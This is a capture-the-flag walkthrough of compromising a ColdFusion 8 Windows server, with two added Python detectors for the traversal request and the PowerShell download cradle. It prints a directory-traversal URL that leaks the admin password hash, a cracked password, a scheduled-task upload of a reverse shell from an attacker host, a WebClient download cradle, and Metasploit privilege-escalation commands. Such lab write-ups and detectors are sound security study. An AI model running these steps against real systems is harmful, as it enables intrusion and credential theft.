Reconnaissance
Web App Enumeration
Exploitation
Windows Privilege Escalation
________________________________________
Reconnaissance
Run the nmapAutomator.sh script to automate the recon/enumeration process.
The output reveals port 8500 running an unknown service. Let's browse it:
http://10.10.10.11:8500
We have two directories; let's browse /CFIDE.
Web App Enumeration
In the /CFIDE directory, administrator looks interesting; let's open it.
We get the 'Adobe ColdFusion 8 Administrator' login page.
After googling we find the "Adobe ColdFusion - Directory Traversal" exploit.
URL : http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
It reveals the password hash; let's crack it with the CrackStation online tool.
The password is: happyday. Let's log in.
After logging in, under the Debugging & Logging category there is a sub-category Scheduled Tasks that allows us to upload files. We can schedule a new task and upload our shell, but first we generate our shellcode.
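The traversal request above leaves a distinctive trace in the web server's access log: a `locale` parameter carrying `../` path components and a `%00` null byte that truncates the `en` suffix. The following is an added defensive example, not part of the original walkthrough: it parses Common Log Format lines (constructed here, not real server logs), decodes the query string twice so that double-encoded variants are caught, and flags requests that combine traversal sequences or NUL bytes with the ColdFusion administrator path.

```python
"""Flag ColdFusion locale-parameter traversal attempts in web access logs.

Added defensive example for the enter.cfm?locale=... request in the
walkthrough; the log lines below are constructed, not real server logs.
"""
from __future__ import annotations
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Common Log Format lines: two abuse attempts, two normal requests.
# The third line is double-encoded (%252F -> %2F -> /) to exercise the second decode.
SAMPLE_LOG = """\
10.10.14.50 - - [10/Mar/2020:12:00:01 +0000] "GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en HTTP/1.1" 200 1532
10.10.14.50 - - [10/Mar/2020:12:00:05 +0000] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 4201
192.0.2.7 - - [10/Mar/2020:12:01:10 +0000] "GET /CFIDE/administrator/enter.cfm?locale=..%252F..%252Fwindows%252Fwin.ini%2500en HTTP/1.1" 200 900
192.0.2.9 - - [10/Mar/2020:12:02:00 +0000] "GET /index.cfm HTTP/1.1" 200 120
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)$'
)
# "../" or "..\" appearing as a whole path component, checked after decoding.
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')
ADMIN_PREFIX = "/cfide/administrator/"


def analyse_target(target: str) -> list[str]:
    """Return the reasons a request target looks like traversal abuse (empty if clean)."""
    reasons = []
    parts = urlsplit(target)
    # parse_qs removes one layer of percent-encoding; unquote again to catch double-encoding.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            value = unquote(value)
            if TRAVERSAL_RE.search(value):
                reasons.append(f"traversal sequence in parameter '{name}'")
            if "\x00" in value:
                reasons.append(f"NUL byte in parameter '{name}' (suffix-truncation trick)")
    if reasons and parts.path.lower().startswith(ADMIN_PREFIX):
        reasons.append("target is the ColdFusion administrator path")
    return reasons


def scan_log(text: str) -> list[dict]:
    """Parse access-log lines and return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a production pipeline should count these
        reasons = analyse_target(m["target"])
        if reasons:
            findings.append({"ip": m["ip"], "ts": m["ts"],
                             "target": m["target"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["ip"], finding["target"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

Run against the constructed sample it reports the first and third lines and leaves the normal `locale=en` request alone. Because the check runs on the decoded value rather than on the raw request, it is not defeated by percent-encoding `.`, `/` or the null byte; the NUL-byte check on its own is also worth keeping as a separate alert, since legitimate clients never send `%00` in a locale value.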
Exploitation
To generate the shellcode we will use msfvenom.
Let's upload our shell:
task name : re
url : http://10.10.14.50/RS2.jsp
publish : check save output to a file
file : C:\ColdFusion8\wwwroot\CFIDE\RS2.jsp
After submitting the task we have to run a Python SimpleHTTPServer on port 80, click Run Scheduled Tasks, and start our listener.
We got a reverse shell, and the user flag is in C:\Users\tolis\Desktop\user.txt.
We have a low-privilege shell, so let's upgrade it for privilege escalation. We can generate a meterpreter shell and upload it via the PowerShell command powershell "(new-object System.Net.WebClient).Downloadfile('http://10.10.14.50:80/ps.exe', 'ps.exe')", then fire up msfconsole and catch the reverse shell.
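The WebClient.Downloadfile one-liner used here is a classic download cradle, and the fact that it is launched from the ColdFusion server process is what makes it stand out in endpoint telemetry. The following is an added defensive example, not code from the original walkthrough: it runs over constructed process-creation records shaped like Sysmon Event ID 1 fields, matches the cradle in both plain and `-EncodedCommand` form, extracts the download URL, and raises the severity when the parent is a server process. The parent-process list (jrun.exe for ColdFusion 8's JRun host, w3wp.exe for IIS, httpd.exe for Apache) and the sample paths are assumptions to tune per environment.

```python
"""Flag PowerShell download cradles in process-creation telemetry.

Added defensive example for the WebClient.Downloadfile one-liner in the
walkthrough. The events below are constructed to resemble Sysmon Event ID 1
records; they are not real telemetry, and SERVER_PARENTS is an assumption.
"""
from __future__ import annotations
import base64
import re

CRADLE_RE = re.compile(
    r"new-object\s+(?:system\.)?net\.webclient\b.*?"
    r"\.(?:downloadfile|downloadstring|downloaddata)\s*\(",
    re.IGNORECASE | re.DOTALL,
)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})",
                        re.IGNORECASE)

# Assumed: server processes that should never spawn PowerShell interactively.
# jrun.exe hosts ColdFusion 8, w3wp.exe is the IIS worker, httpd.exe is Apache.
SERVER_PARENTS = {"jrun.exe", "w3wp.exe", "httpd.exe"}

# Constructed sample events (paths and addresses are made up for this example).
ENCODED_SCRIPT = "(New-Object Net.WebClient).DownloadString('http://192.0.2.5/x.ps1')"
SAMPLE_EVENTS = [
    {   # the walkthrough's one-liner, launched from the ColdFusion host process
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\ColdFusion8\runtime\bin\jrun.exe",
        "CommandLine": "powershell \"(new-object System.Net.WebClient)"
                       ".Downloadfile('http://10.10.14.50:80/ps.exe', 'ps.exe')\"",
    },
    {   # the same technique wrapped in -EncodedCommand, from an interactive session
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell.exe -NoP -enc "
                       + base64.b64encode(ENCODED_SCRIPT.encode("utf-16-le")).decode(),
    },
    {   # benign administrative use
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell.exe Get-Service | Where-Object Status -eq Running",
    },
]


def _encoded_payloads(cmd: str) -> list[str]:
    """Decode -EncodedCommand arguments (base64 of UTF-16LE script text)."""
    out = []
    for token in ENCODED_RE.findall(cmd):
        try:
            out.append(base64.b64decode(token).decode("utf-16-le", errors="ignore"))
        except ValueError:  # binascii.Error is a ValueError; skip malformed tokens
            continue
    return out


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyse_event(ev: dict) -> dict | None:
    """Return a finding for one process-creation event, or None if it looks benign."""
    if _basename(ev.get("Image", "")) not in {"powershell.exe", "pwsh.exe"}:
        return None
    cmd = ev.get("CommandLine", "")
    texts = [cmd] + _encoded_payloads(cmd)
    urls, cradle = [], False
    for text in texts:  # inspect the raw command line and every decoded payload
        if CRADLE_RE.search(text):
            cradle = True
            urls += URL_RE.findall(text)
    if not cradle:
        return None
    reasons = ["WebClient download cradle"]
    if len(texts) > 1:
        reasons.append("payload passed via -EncodedCommand")
    parent = _basename(ev.get("ParentImage", ""))
    if parent in SERVER_PARENTS:
        reasons.append(f"spawned by server process {parent}")
    return {"parent": parent, "urls": sorted(set(urls)), "reasons": reasons}


def scan_events(events: list[dict]) -> list[dict]:
    """Apply analyse_event to a batch and keep only the findings."""
    return [f for f in (analyse_event(e) for e in events) if f]


if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(finding["parent"], finding["urls"], "; ".join(finding["reasons"]))
```

The extracted URL is the pivot a responder wants first: it identifies the staging host to block and gives the artifact name to hunt for on disk. Matching on the parent process rather than on PowerShell alone keeps the rule quiet on administrator workstations while still firing on a web application server that suddenly starts downloading executables.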
Windows Privilege Escalation
sysinfo reveals that the system is x64 while our meterpreter shell is x86, so let's migrate it to an x64 process.
As we are enumerating for privesc, let's run the local exploit suggester to find candidate exploits.
We can use exploit/windows/local/ms10_092_schelevator (Windows Escalate Task Scheduler XML Privilege Escalation):
cmd use exploit/windows/local/ms10_092_schelevator
set session 6
set lhost 10.10.14.50
set lport 4444
show options
run
We got the shell; the root flag is in C:\Users\Administrator\Desktop\root.txt.